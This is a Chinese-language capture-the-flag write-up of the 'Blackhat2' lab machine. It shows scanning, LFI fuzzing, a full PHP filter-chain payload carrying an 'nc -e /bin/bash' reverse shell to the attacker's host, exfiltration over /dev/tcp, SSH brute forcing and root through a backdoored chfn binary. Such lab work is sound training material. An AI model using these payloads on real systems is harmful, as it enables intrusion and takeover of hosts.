Blackhat2

非常不错的一个靶机ʕ•̫͡• ʔ•̫͡•ཻʕ•̫͡•ʔ•͓͡•ʔ

信息搜集

端口扫描

┌──(kali💀kali)-[~/temp/blackhat2]
└─$ rustscan -a 192.168.0.125 -- -A
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.0.125:22
Open 192.168.0.125:80

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 04:2a:cb:c4:54:0e:de:54:a1:f2:61:d7:6a:29:f6:5f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBUIyR90zqbTcOv6QWBqWJd9VdbWlQGf7cvk2FHPkzLIcHPHFn07VAZ3uxnFKlIDFytteuJ2qtVlhmK5TMnBxxg=
|   256 a8:02:05:f3:a6:61:7d:e8:8b:e5:6f:1c:5b:7b:5b:33 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMN5dOXWLsMESN+NWjIo49NYaAJl8lCuoiTtA8zxqdSF
80/tcp open  http    syn-ack Apache httpd 2.4.57 ((Debian))
|_http-title: Home - Hacked By sML
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.57 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

目录扫描

┌──(kali💀kali)-[~/temp/blackhat2]
└─$ gobuster dir -u http://192.168.0.125/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.125/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              bak,jpg,txt,html,php,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 278]
/news.php             (Status: 200) [Size: 3418]
/.php                 (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 996]
/index.php            (Status: 200) [Size: 996]
/dp.jpg               (Status: 200) [Size: 238753]
/2021                 (Status: 200) [Size: 31875]
/2022                 (Status: 200) [Size: 34213]
/2023                 (Status: 200) [Size: 36067]
/.php                 (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
Progress: 1543920 / 1543927 (100.00%)
===============================================================
Finished
===============================================================

漏洞发现

踩点

敏感目录

http://192.168.0.125/dp.jpg

还有很多，但是暂时没啥用：

fuzz

┌──(kali💀kali)-[~/temp/blackhat2]
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -u 'http://192.168.0.125/news.php?FUZZ=../../../../../../'  -fw 1401

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.0.125/news.php?FUZZ=../../../../../../
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 1401
________________________________________________

email                   [Status: 200, Size: 3927, Words: 1571, Lines: 150, Duration: 2ms]
:: Progress: [26584/26584] :: Job [1/1] :: 2564 req/sec :: Duration: [0:00:08] :: Errors: 2 ::

尝试一下LFI漏洞：

进一步尝试：

php filter链

http://192.168.0.125/news.php?year=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&0=nc -e /bin/bash 192.168.0.143 1234

提权

信息搜集

(remote) www-data@blackhat2.hmv:/var/www/html$ ls -la
total 852
drwxr-xr-x 2 root root   4096 Feb 26 10:19 .
drwxr-xr-x 4 root root   4096 Feb 26 10:19 ..
-rw-r--r-- 1 root root  31875 Feb 26 10:19 2021
-rw-r--r-- 1 root root  34213 Feb 26 10:19 2022
-rw-r--r-- 1 root root  36067 Feb 26 10:19 2023
-rw-r--r-- 1 root root 238753 Feb 26 10:19 dp.jpg
-rw-r--r-- 1 root root   4658 Feb 26 10:19 full-stack-apache-setup.xml
-rw-r--r-- 1 root root 485364 Feb 26 10:19 hacker.webp
-rw-r--r-- 1 root root    996 Feb 26 10:19 index.html
-rw-r--r-- 1 root root    996 Feb 26 10:19 index.php
-rw-r--r-- 1 root root   4560 Feb 26 10:19 news.php
-rw-r--r-- 1 root root   2332 Feb 26 10:19 style.css
(remote) www-data@blackhat2.hmv:/var/www/html$ head hacker.webp 
RIFF�gWEBPVP8 
_�+
   �*>1�B�!! �/��fwa?��y�A���,�7���%������]���
                                              ������w����T�a��ć�m���\~_���#��3�+۳�}@?��c�`>��`~�������_�/�_���|~��������E��~Zu��>����������|�q�^|����������v��o�~������(}��
���o�����������W������h~��������+���?�������������?���~Xr�_����������u���M��������?     ��?������
                                                                                                 ���c����̷�����?������������?�?�?����������?���������w�G��܏�_����5�����ܿgU�3������?�~����]�;����������l�����?�?l�v����������������_���s�?�����������_�����k�K����?�o�_���?����������?�?�~�|�[�/���'�?ۯ�/�?���s�����������y�������_�?�����%���g�/����?�����������O��0�������IK�l@ɞ
                                                                        C�3��ըY<M�c�W���yl\O���t~��
                                                                                                   ����|%��TϤj���e���؁J�`
                                                                                                                        �k���56QW�p�ŊY��������s
                                                                                                                                               ܀�*٫�>;����&�Z�M�Vv��0�:Z��P�
                         �ѱ��f]��?�-��#P�fs)�Gˏ�m1$�ԍ ����,F�<BX�8�    ���=l����&���<�O�s�T\�!�i3I�nOt}���I����"r�f���Ǣ�o~���$�v�t�l}�U?�|�T3��r��R�q�'�w�
F.~�(��zE�5�e=vf-D5T��;E�b:�Z�_KwQ���e��N%?������k_^��1y���     ����z?4��^�Մ���?b|��ӔE�
��g׽r�`%Q�z��;߁���^�PJ��v3��Eߜ:ԥ���yA
                                     8]��vGo4�:��t����^��(�Y �����V��x�&w�2�r��s1^|[]���D
                                                                                         Z���ҩH�~��S遂�
G|�LGmE������ݺ��g?�
                   �<Rc���+lk6�iEX��K�>���yѰ��iL�|�";��N���r��� 1Z>5
����f�I�"o{:t�}^��2_�����kx�ž{��ۑ��]�+6j�                           ��{r
�*�ũ}Ģ�/��C>��ZK�s;$Ӄ��)z�`Nv�6��bP
                                 r�U|w�|#z��1�H
�%�� �:S�˯�42�RԺ�ߑ��~u��,��:�ϵl����*6R�>���$�F�?׺��� 3�t^ق��E�O�dQm[��8X��-��`kZq�4��dJ���j$r��t�w��*��.�{�y
                 ���&���;
Ti�<���R�D��?Nr8GzG��6���3�Z�ZHM,H����*]�~4�x�HS��ٻ�&`޾̕��ʿbs�����Zc
��`o�˼��<V�L��a�:]�ÕM�p
���ٵ��o�dz�G�w����usP�p�u�mq�_���ICWr&��9:��+�
��D��ߣ��;Sa�#AR�(q,�d�#�so*C�B�&�iH���¯iK�w+�ր�mݸ��>ӻ�4L}z��܋��b        �1      I�����F��'pi X_�����U�X�E�ގ�Iw'��b#,��$�i���
                                                             \����/���r��\G�k�����F�����O�8��E����Dr��&�^*K~y��`�`�k��f�8�7�Y���F/����^
�sG�Lh1"�kd����ɩ~c@���W���g��,�t��j\�A���X�LѤ�ۄwDF����K�=��\���w=�H��Y��W2V-�)�
           ���  ���֔�����Sg�5*�:uY
                                 �ث����<y��1<xt�!-y�,"�a8�ҽ�:xf�ʸ�cX��U�f��EJi�>=��>���P�P�]��U���.�c�$m0��9g�Kd�~��Q�!�&����/�a.���U�Sڜ
                                                                                                                                        �H
                                                                                                                                         ���j�9�<=M/Ә&7E�#4��      �E�M奔5j��ތ�dWT��WnK�A䃇Ôq��b��B_��@�)ѴTJ3�V0�"�\q�L���?��2M0N8��]�0��k�&����By?\1��~�.�L&�ҹ�q�Fh�vw�� a�jfx�����i���d$��t�h��
�8�+��W�^�![�ޖ���j������EP���w��z>ӵz�F@&�ݲ ;P�`('���,�\��hD��rX����I�"� $5��Ԓ�l��� �~��Plm��_�����wW:�    cp
     ��'�H�R�}��:-����wD�o��e���N:��D���m�>_8��Z%3�Vj��j�9�i��}�v���/X$4����^�3F��
�z�4j��~/���_z�ķŝX��ޢ���葿H�L����qn3�"N�
(remote) www-data@blackhat2.hmv:/var/www/html$ sudo -l
bash: sudo: command not found
(remote) www-data@blackhat2.hmv:/var/www/html$ cat /etc/passwd | grep "bash"
root:x:0:0:root:/root:/bin/bash
sml:x:1000:1000:,,,:/home/sml:/bin/bash
(remote) www-data@blackhat2.hmv:/var/www/html$ cd /home
(remote) www-data@blackhat2.hmv:/home$ ls -la
total 12
drwxr-xr-x  3 root root 4096 Feb 26 10:25 .
drwxr-xr-x 18 root root 4096 Feb 26 09:58 ..
drwx------  3 sml  sml  4096 Feb 26 10:32 sml
(remote) www-data@blackhat2.hmv:/var/www$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/umount
(remote) www-data@blackhat2.hmv:/var/www$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping cap_net_raw=e

尝试传一个敏感文件过来：

(remote) www-data@blackhat2.hmv:/var/www/html$ ls -la
total 852
drwxr-xr-x 2 root root   4096 Feb 26 10:19 .
drwxr-xr-x 4 root root   4096 Feb 26 10:19 ..
-rw-r--r-- 1 root root  31875 Feb 26 10:19 2021
-rw-r--r-- 1 root root  34213 Feb 26 10:19 2022
-rw-r--r-- 1 root root  36067 Feb 26 10:19 2023
-rw-r--r-- 1 root root 238753 Feb 26 10:19 dp.jpg
-rw-r--r-- 1 root root   4658 Feb 26 10:19 full-stack-apache-setup.xml
-rw-r--r-- 1 root root 485364 Feb 26 10:19 hacker.webp
-rw-r--r-- 1 root root    996 Feb 26 10:19 index.html
-rw-r--r-- 1 root root    996 Feb 26 10:19 index.php
-rw-r--r-- 1 root root   4560 Feb 26 10:19 news.php
-rw-r--r-- 1 root root   2332 Feb 26 10:19 style.css
(remote) www-data@blackhat2.hmv:/var/www/html$ cat hacker.webp > /dev/tcp/192.168.0.143/4444

┌──(kali💀kali)-[~/temp/blackhat2]
└─$ nc -lvnp 4444 > hacker.webp
listening on [any] 4444 ...
connect to [192.168.0.143] from (UNKNOWN) [192.168.0.125] 59234

本地看一下：

无用功？？？？

上传linpeas.sh和pspy64：

然后运行pspy64，看一下有些啥：

没东西，继续找一下是否有可以利用的，但是没啥发现，尝试进行内网扫描，直接使用师傅的了!：

for c in {0..255}
do
ips="192.168.$c"
    for d in {0..255}
    do
    ip="$ips.$d"
    ok=0
        for count in {1..3}
        do
            ping -c1 -W1 $ip &>/dev/null
            if [ $? -eq 0 ]
            then
                ok=1
                break
            fi

        done
        if [ $ok -eq 1 ]
            then
                echo "$ip ping is ok"
        else
            continue
        fi
        done
done

192.168.0.1 ping is ok
192.168.0.125 ping is ok
192.168.0.143 ping is ok

没东西，尝试生成字典爆破、rockyou.txt爆破，以及cewl字典爆破，都失败了。

┌──(kali💀kali)-[~/temp/blackhat2]
└─$ hydra -l sml -P pass.txt ssh://192.168.0.125 2>/dev/null
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-02 07:18:27
[DATA] max 16 tasks per 1 server, overall 16 tasks, 237 login tries (l:1/p:237), ~15 tries per task
[DATA] attacking ssh://192.168.0.125:22/
[STATUS] 144.00 tries/min, 144 tries in 00:01h, 95 to do in 00:01h, 14 active
[STATUS] 113.00 tries/min, 226 tries in 00:02h, 13 to do in 00:01h, 14 active
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-02 07:21:00

一无所获，我要裂开了。。。然后就把注意打到了作者身上。。。。

嘿嘿，给作者点赞，进行扫描：

┌──(kali💀kali)-[~/temp/blackhat2]
└─$ sudo nmap 192.168.0.125 -sU -p 1-100
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:4A:F6:66 (Oracle VirtualBox virtual NIC)

尝试信息搜集一下：

┌──(kali💀kali)-[~/temp/blackhat2]
└─$ sudo nmap -sU --script broadcast-dhcp-discover -p 68 192.168.0.125
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-02 12:04 EDT
Pre-scan script results:
| broadcast-dhcp-discover: 
|   Response 1 of 2: 
|     Interface: eth0
|     IP Offered: 10.0.2.21
|     Server Identifier: 10.0.2.3
|     DHCP Message Type: DHCPOFFER
|     Subnet Mask: 255.255.255.0
|     Router: 10.0.2.1
|     Domain Name Server: 192.168.0.1
|     IP Address Lease Time: 10m00s
|   Response 2 of 2: 
|     Interface: eth1
|     IP Offered: 192.168.0.117
|     DHCP Message Type: DHCPOFFER
|     Server Identifier: 192.168.0.1
|     IP Address Lease Time: 1d00h00m00s
|     Renewal Time Value: 12h00m00s
|     Rebinding Time Value: 21h00m00s
|     Subnet Mask: 255.255.255.0
|     Broadcast Address: 192.168.0.255
|     Router: 192.168.0.1
|_    Domain Name Server: 192.168.0.1
Nmap scan report for blackhat2.hmv (192.168.0.125)
Host is up (0.00054s latency).

PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:4A:F6:66 (Oracle VirtualBox virtual NIC)

参考：

https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-network#dhcp-attacks

https://secybr.com/posts/dhcp-pentesting-best-practices/

https://www.rapid7.com/db/modules/exploit/unix/dhcp/rhel_dhcp_client_command_injection/

chfn后门提权

然后过了几天，作者发出了解法：https://www.youtube.com/watch?v=07R30pWov64

并且给出了一些提示，但是都毫无思路：

rpj7最先看到并且进行了尝试：

尝试按照作者思路看一下：

(remote) www-data@blackhat2.hmv:/tmp$ dpkg --verify | grep -vi missing
??5?????? c /etc/grub.d/10_linux
??5??????   /usr/bin/chfn

• -v：这是 grep 的一个选项，表示“反向匹配”，即只显示不匹配指定模式的行。
• -i：这是另一个 grep 选项，表示“忽略大小写”。但在这个上下文中，它可能不是必需的，因为我们通常不会关心输出中的大小写（尽管这取决于 dpkg --verify 的具体输出）。

尝试下载过来，然后尝试进行反编译一下：

嘶，原来后门在这里，尝试利用：

(remote) www-data@blackhat2.hmv:/tmp$ ls -la
total 8
drwxrwxrwt  2 root root 4096 May  7 11:53 .
drwxr-xr-x 18 root root 4096 Feb 26 09:58 ..
(remote) www-data@blackhat2.hmv:/tmp$ vi system
(remote) www-data@blackhat2.hmv:/tmp$ ls -la
total 12
drwxrwxrwt  2 root     root     4096 May  7 12:20 .
drwxr-xr-x 18 root     root     4096 Feb 26 09:58 ..
-rw-r--r--  1 www-data www-data   20 May  7 12:20 system
(remote) www-data@blackhat2.hmv:/tmp$ cat *
chmod +s /bin/bash

(remote) www-data@blackhat2.hmv:/tmp$ ls -l /bin/bash
-rwxr-xr-x 1 root root 1265648 Apr 23  2023 /bin/bash
(remote) www-data@blackhat2.hmv:/tmp$ chmod +x system 
(remote) www-data@blackhat2.hmv:/tmp$ /usr/bin/chfn
Changing the user information for root
Enter the new value, or press ENTER for the default
        Full Name [root]: 
        Room Number []: 
        Work Phone []: 
        Home Phone []: 
        Other []: 
(remote) www-data@blackhat2.hmv:/tmp$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1265648 Apr 23  2023 /bin/bash
(remote) www-data@blackhat2.hmv:/tmp$ bash -p
(remote) root@blackhat2.hmv:/tmp# ls -la
total 12
drwxrwxrwt  2 root     root     4096 May  7 12:20 .
drwxr-xr-x 18 root     root     4096 Feb 26 09:58 ..
-rwxr-xr-x  1 www-data www-data   20 May  7 12:20 system
(remote) root@blackhat2.hmv:/tmp# cd /root
(remote) root@blackhat2.hmv:/root# ls -la
total 32
drwx------  4 root root 4096 Feb 26 10:19 .
drwxr-xr-x 18 root root 4096 Feb 26 09:58 ..
lrwxrwxrwx  1 root root    9 Feb 26 10:07 .bash_history -> /dev/null
-rw-r--r--  1 root root  571 Feb 26 10:19 .bashrc
-rw-------  1 root root   20 Feb 26 10:19 .lesshst
drwxr-xr-x  3 root root 4096 Feb 26 10:19 .local
-rw-r--r--  1 root root  161 Feb 26 10:19 .profile
drwx------  2 root root 4096 Feb 26 10:19 .ssh
-rwx------  1 root root   33 Feb 26 10:19 root.txt
(remote) root@blackhat2.hmv:/root# cat root.txt

利用简单，但是是一种很不错的思路，很多的黑客喜欢将后门插入系统文件中，方便利用，且不易被发现，甚至是编译器，这真的是一个很不错的靶机。致敬作者！